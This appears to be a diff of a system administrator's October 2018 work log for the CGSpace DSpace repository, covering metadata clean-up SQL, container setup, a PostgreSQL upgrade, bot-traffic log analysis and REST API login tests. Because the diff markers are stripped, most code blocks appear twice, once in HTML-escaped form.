<pre tabindex="0"><code> &lt;!--&lt;policy domain=&#34;coder&#34; rights=&#34;none&#34; pattern=&#34;PDF&#34; /&gt;--&gt;
</code></pre><ul>
<li>This works, but I&rsquo;m not sure what ImageMagick&rsquo;s long-term plan is if they are going to disable ALL image formats&hellip;</li>
<li>I suppose I need to enable a workaround for this in Ansible?</li>
@ -261,7 +261,7 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>I emailed DuraSpace to update <a href="https://duraspace.org/registry/entry/4188/?gvid=178">our entry in their DSpace registry</a> (the data was still on DSpace 3, JSPUI, etc)</li>
<li>Generate a list of the top 1500 values for <code>dc.subject</code> so Sisay can start making a controlled vocabulary for it:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-10-11-top-1500-subject.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-10-11-top-1500-subject.csv WITH CSV HEADER;
COPY 1500
</code></pre><ul>
<li>Give WorldFish advice about Handles because they are talking to some company called KnowledgeArc who recommends they do not use Handles!</li>
@ -269,27 +269,27 @@ COPY 1500
<li>Altmetric support responded to say no, but the reason is that Land Portal is doing even more strange stuff by not using <code>&lt;meta&gt;</code> tags in their page header, and using &ldquo;dct:identifier&rdquo; property instead of &ldquo;dc:identifier&rdquo;</li>
<li>I re-created my local DSpace databse container using <a href="https://github.com/containers/libpod">podman</a> instead of Docker:</li>
</ul>
<pre><code>$ mkdir -p ~/.local/lib/containers/volumes/dspacedb_data
<pre tabindex="0"><code>$ mkdir -p ~/.local/lib/containers/volumes/dspacedb_data
$ sudo podman create --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ sudo podman start dspacedb
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>I tried to make an Artifactory in podman, but it seems to have problems because Artifactory is distributed on the Bintray repository</li>
<li>I can pull the <code>docker.bintray.io/jfrog/artifactory-oss:latest</code> image, but not start it</li>
<li>I decided to use a Sonatype Nexus repository instead:</li>
</ul>
<pre><code>$ mkdir -p ~/.local/lib/containers/volumes/nexus_data
<pre tabindex="0"><code>$ mkdir -p ~/.local/lib/containers/volumes/nexus_data
$ sudo podman run --name nexus -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
</code></pre><ul>
<li>With a few changes to my local Maven <code>settings.xml</code> it is working well</li>
<li>Generate a list of the top 10,000 authors for Peter Ballantyne to look through:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 3 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 10000) to /tmp/2018-10-11-top-10000-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 3 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 10000) to /tmp/2018-10-11-top-10000-authors.csv WITH CSV HEADER;
COPY 10000
</code></pre><ul>
<li>CTA uploaded some infographics that are very tall and their thumbnails disrupt the item lists on the front page and in their communities and collections</li>
@ -301,7 +301,7 @@ COPY 10000
<li>Look through Peter&rsquo;s list of 746 author corrections in OpenRefine</li>
<li>I first facet by blank, trim whitespace, and then check for weird characters that might be indicative of encoding issues with this GREL:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
isNotNull(value.match(/.*\u200A.*/)),
@ -311,7 +311,7 @@ COPY 10000
</code></pre><ul>
<li>Then I exported and applied them on my local test server:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t CORRECT -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t CORRECT -m 3
</code></pre><ul>
<li>I will apply these on CGSpace when I do the other updates tomorrow, as well as double check the high scoring ones to see if they are correct in Sisay&rsquo;s author controlled vocabulary</li>
</ul>
@ -321,7 +321,7 @@ COPY 10000
<li>Switch to new CGIAR LDAP server on CGSpace, as it&rsquo;s been running (at least for authentication) on DSpace Test for the last few weeks, and I think they old one will be deprecated soon (today?)</li>
<li>Apply Peter&rsquo;s 746 author corrections on CGSpace and DSpace Test using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Run all system updates on CGSpace (linode19) and reboot the server</li>
<li>After rebooting the server I noticed that Handles are not resolving, and the <code>dspace-handle-server</code> systemd service is not running (or rather, it exited with success)</li>
@ -352,24 +352,24 @@ COPY 10000
</li>
<li>I ended up having some issues with podman and went back to Docker, so I had to re-create my containers:</li>
</ul>
<pre><code>$ sudo docker run --name nexus --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
<pre tabindex="0"><code>$ sudo docker run --name nexus --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><h2 id="2018-10-16">2018-10-16</h2>
<ul>
<li>Generate a list of the schema on CGSpace so CodeObia can compare with MELSpace:</li>
</ul>
<pre><code>dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN 'dc' WHEN metadata_schema_id=2 THEN 'cg' END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN &#39;dc&#39; WHEN metadata_schema_id=2 THEN &#39;cg&#39; END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
</code></pre><ul>
<li>Talking to the CodeObia guys about the REST API I started to wonder why it&rsquo;s so slow and how I can quantify it in order to ask the dspace-tech mailing list for help profiling it</li>
<li>Interestingly, the speed doesn&rsquo;t get better after you request the same thing multiple timesit&rsquo;s consistently bad on both CGSpace and DSpace Test!</li>
</ul>
<pre><code>$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.35s user 0.06s system 1% cpu 25.133 total
0.31s user 0.04s system 1% cpu 25.223 total
@ -377,7 +377,7 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
0.20s user 0.05s system 1% cpu 23.838 total
0.30s user 0.05s system 1% cpu 24.301 total
$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.22s user 0.03s system 1% cpu 17.248 total
0.23s user 0.02s system 1% cpu 16.856 total
@ -389,7 +389,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
<li>I wonder if the Java garbage collector is important here, or if there are missing indexes in PostgreSQL?</li>
<li>I switched DSpace Test to the G1GC garbage collector and tried again and now the results are worse!</li>
</ul>
<pre><code>$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.20s user 0.03s system 0% cpu 25.017 total
0.23s user 0.02s system 1% cpu 23.299 total
@ -399,7 +399,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
</code></pre><ul>
<li>If I make a request without the expands it is ten time faster:</li>
</ul>
<pre><code>$ time http --print h 'https://dspacetest.cgiar.org/rest/items?limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?limit=100&amp;offset=0&#39;
...
0.20s user 0.03s system 7% cpu 3.098 total
0.22s user 0.03s system 8% cpu 2.896 total
@ -414,29 +414,29 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
<li>Most of the are from Bioversity, and I asked Maria for permission before updating them</li>
<li>I manually went through and looked at the existing values and updated them in several batches:</li>
</ul>
<pre><code>UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%CC BY %';
UPDATE metadatavalue SET text_value='CC-BY-NC-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-ND%' AND text_value LIKE '%by-nc-nd%';
UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-SA%' AND text_value LIKE '%by-nc-sa%';
UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value LIKE '%/by/%';
UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%/by/%' AND text_value NOT LIKE '%zero%';
UPDATE metadatavalue SET text_value='CC-BY-NC-2.5' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
'%/by-nc%' AND text_value LIKE '%2.5%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%4.0%';
UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%zero%';
UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution-NonCommercial-ShareAlike%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
UPDATE metadatavalue SET text_value='CC-BY-NC-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution %';
UPDATE metadatavalue SET text_value='CC-BY-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
UPDATE metadatavalue SET text_value='CC-BY' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value NOT LIKE '%CC0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%CC-%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%CC BY %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-ND%&#39; AND text_value LIKE &#39;%by-nc-nd%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-SA%&#39; AND text_value LIKE &#39;%by-nc-sa%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value LIKE &#39;%/by/%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%/by/%&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-2.5&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
&#39;%/by-nc%&#39; AND text_value LIKE &#39;%2.5%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%/by-nc%&#39; AND text_value LIKE &#39;%4.0%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial-ShareAlike%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
UPDATE metadatavalue SET text_value=&#39;CC-BY&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value NOT LIKE &#39;%CC0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%CC-%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
</code></pre><ul>
<li>I updated the fields on CGSpace and then started a re-index of Discovery</li>
<li>We also need to re-think the <code>dc.rights</code> field in the submission form: we should probably use a popup controlled vocabulary and list the Creative Commons values with version numbers and allow the user to enter their own (like the ORCID identifier field)</li>
<li>Ask Jane if we can use some of the BDP money to host AReS explorer on a more powerful server</li>
<li>IWMI sent me a list of new ORCID identifiers for their staff so I combined them with our list, updated the names with my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script, and regenerated the controlled vocabulary:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt;
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt;
2018-10-17-orcids.txt
$ ./resolve-orcids.py -i 2018-10-17-orcids.txt -o 2018-10-17-names.txt -d
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -444,7 +444,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I also decided to add the ORCID identifiers that MEL had sent us a few months ago&hellip;</li>
<li>One problem I had with the <code>resolve-orcids.py</code> script is that one user seems to have disabled their profile data since we last updated:</li>
</ul>
<pre><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
<pre tabindex="0"><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
</code></pre><ul>
<li>So I need to handle that situation in the script for sure, but I&rsquo;m not sure what to do organizationally or ethically, since that user disabled their name! Do we remove him from the list?</li>
@ -457,8 +457,8 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>After they do some tests and we check the values Enrico will send a formal email to Peter et al to ask that they start depositing officially</li>
<li>I upgraded PostgreSQL to 9.6 on DSpace Test using Ansible, then had to manually <a href="https://wiki.postgresql.org/wiki/Using_pg_upgrade_on_Ubuntu/Debian">migrate from 9.5 to 9.6</a>:</li>
</ul>
<pre><code># su - postgres
$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o ' -c config_file=/etc/postgresql/9.5/main/postgresql.conf' -O ' -c config_file=/etc/postgresql/9.6/main/postgresql.conf'
<pre tabindex="0"><code># su - postgres
$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o &#39; -c config_file=/etc/postgresql/9.5/main/postgresql.conf&#39; -O &#39; -c config_file=/etc/postgresql/9.6/main/postgresql.conf&#39;
$ exit
# systemctl start postgresql
# dpkg -r postgresql-9.5 postgresql-client-9.5 postgresql-contrib-9.5
@ -468,7 +468,7 @@ $ exit
<li>Linode emailed me to say that CGSpace (linode18) had high CPU usage for a few hours this afternoon</li>
<li>Looking at the nginx logs around that time I see the following IPs making the most requests:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Oct/2018:(12|13|14|15)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Oct/2018:(12|13|14|15)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
361 207.46.13.179
395 181.115.248.74
485 66.249.64.93
@ -487,18 +487,18 @@ $ exit
<li>I was going to try to run Solr in Docker because I learned I can run Docker on Travis-CI (for testing my dspace-statistics-api), but the oldest official Solr images are for 5.5, and DSpace&rsquo;s Solr configuration is for 4.9</li>
<li>This means our existing Solr configuration doesn&rsquo;t run in Solr 5.5:</li>
</ul>
<pre><code>$ sudo docker pull solr:5
<pre tabindex="0"><code>$ sudo docker pull solr:5
$ sudo docker run --name my_solr -v ~/dspace/solr/statistics/conf:/tmp/conf -d -p 8983:8983 -t solr:5
$ sudo docker logs my_solr
...
ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics] Caused by: solr.IntField
ERROR: Error CREATEing SolrCore &#39;statistics&#39;: Unable to create core [statistics] Caused by: solr.IntField
</code></pre><ul>
<li>Apparently a bunch of variable types were removed in <a href="https://issues.apache.org/jira/browse/SOLR-5936">Solr 5</a></li>
<li>So for now it&rsquo;s actually a huge pain in the ass to run the tests for my dspace-statistics-api</li>
<li>Linode sent a message that the CPU usage was high on CGSpace (linode18) last night</li>
<li>According to the nginx logs around that time it was 5.9.6.51 (MegaIndex) again:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Oct/2018:(14|15|16)&quot; | awk '{print $1}' | sort
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Oct/2018:(14|15|16)&#34; | awk &#39;{print $1}&#39; | sort
| uniq -c | sort -n | tail -n 10
249 207.46.13.179
250 157.55.39.173
@ -513,19 +513,19 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
</code></pre><ul>
<li>This bot is only using the XMLUI and it does <em>not</em> seem to be re-using its sessions:</li>
</ul>
<pre><code># grep -c 5.9.6.51 /var/log/nginx/*.log
<pre tabindex="0"><code># grep -c 5.9.6.51 /var/log/nginx/*.log
/var/log/nginx/access.log:9323
/var/log/nginx/error.log:0
/var/log/nginx/library-access.log:0
/var/log/nginx/oai.log:0
/var/log/nginx/rest.log:0
/var/log/nginx/statistics.log:0
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-10-20 | sort | uniq
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-10-20 | sort | uniq
8915
</code></pre><ul>
<li>Last month I added &ldquo;crawl&rdquo; to the Tomcat Crawler Session Manager Valve&rsquo;s regular expression matching, and it seems to be working for MegaIndex&rsquo;s user agent:</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1' User-Agent:'&quot;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&quot;'
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1&#39; User-Agent:&#39;&#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;&#39;
</code></pre><ul>
<li>So I&rsquo;m not sure why this bot uses so many sessionsis it because it requests very slowly?</li>
</ul>
@ -539,7 +539,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
<li>Change <code>build.properties</code> to use HTTPS for Handles in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
<li>We will still need to do a batch update of the <code>dc.identifier.uri</code> and other fields in the database:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
</code></pre><ul>
<li>While I was doing that I found two items using CGSpace URLs instead of handles in their <code>dc.identifier.uri</code> so I corrected those</li>
<li>I also found several items that had invalid characters or multiple Handles in some related URL field like <code>cg.link.reference</code> so I corrected those too</li>
@ -547,7 +547,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
<li>I deployed the changes on CGSpace, ran all system updates, and rebooted the server</li>
<li>Also, I updated all Handles in the database to use HTTPS:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
UPDATE 76608
</code></pre><ul>
<li>Skype with Peter about ToRs for the AReS open source work and future plans to develop tools around the DSpace ecosystem</li>
@ -560,20 +560,20 @@ UPDATE 76608
<li>I emailed the MARLO guys to ask if they can send us a dump of rights data and Handles from their system so we can tag our older items on CGSpace</li>
<li>Testing REST login and logout via httpie because Felix from Earlham says he&rsquo;s having issues:</li>
</ul>
<pre><code>$ http --print b POST 'https://dspacetest.cgiar.org/rest/login' email='testdeposit@cgiar.org' password=deposit
<pre tabindex="0"><code>$ http --print b POST &#39;https://dspacetest.cgiar.org/rest/login&#39; email=&#39;testdeposit@cgiar.org&#39; password=deposit
acef8a4a-41f3-4392-b870-e873790f696b
$ http POST 'https://dspacetest.cgiar.org/rest/logout' rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
$ http POST &#39;https://dspacetest.cgiar.org/rest/logout&#39; rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
</code></pre><ul>
<li>Also works via curl (login, check status, logout, check status):</li>
</ul>
<pre><code>$ curl -H &quot;Content-Type: application/json&quot; --data '{&quot;email&quot;:&quot;testdeposit@cgiar.org&quot;, &quot;password&quot;:&quot;deposit&quot;}' https://dspacetest.cgiar.org/rest/login
<pre tabindex="0"><code>$ curl -H &#34;Content-Type: application/json&#34; --data &#39;{&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;, &#34;password&#34;:&#34;deposit&#34;}&#39; https://dspacetest.cgiar.org/rest/login
e09fb5e1-72b0-4811-a2e5-5c1cd78293cc
$ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/status
{&quot;okay&quot;:true,&quot;authenticated&quot;:true,&quot;email&quot;:&quot;testdeposit@cgiar.org&quot;,&quot;fullname&quot;:&quot;Test deposit&quot;,&quot;token&quot;:&quot;e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot;}
$ curl -X POST -H &quot;Content-Type: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/logout
$ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/status
{&quot;okay&quot;:true,&quot;authenticated&quot;:false,&quot;email&quot;:null,&quot;fullname&quot;:null,&quot;token&quot;:null}%
$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
{&#34;okay&#34;:true,&#34;authenticated&#34;:true,&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;,&#34;fullname&#34;:&#34;Test deposit&#34;,&#34;token&#34;:&#34;e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34;}
$ curl -X POST -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/logout
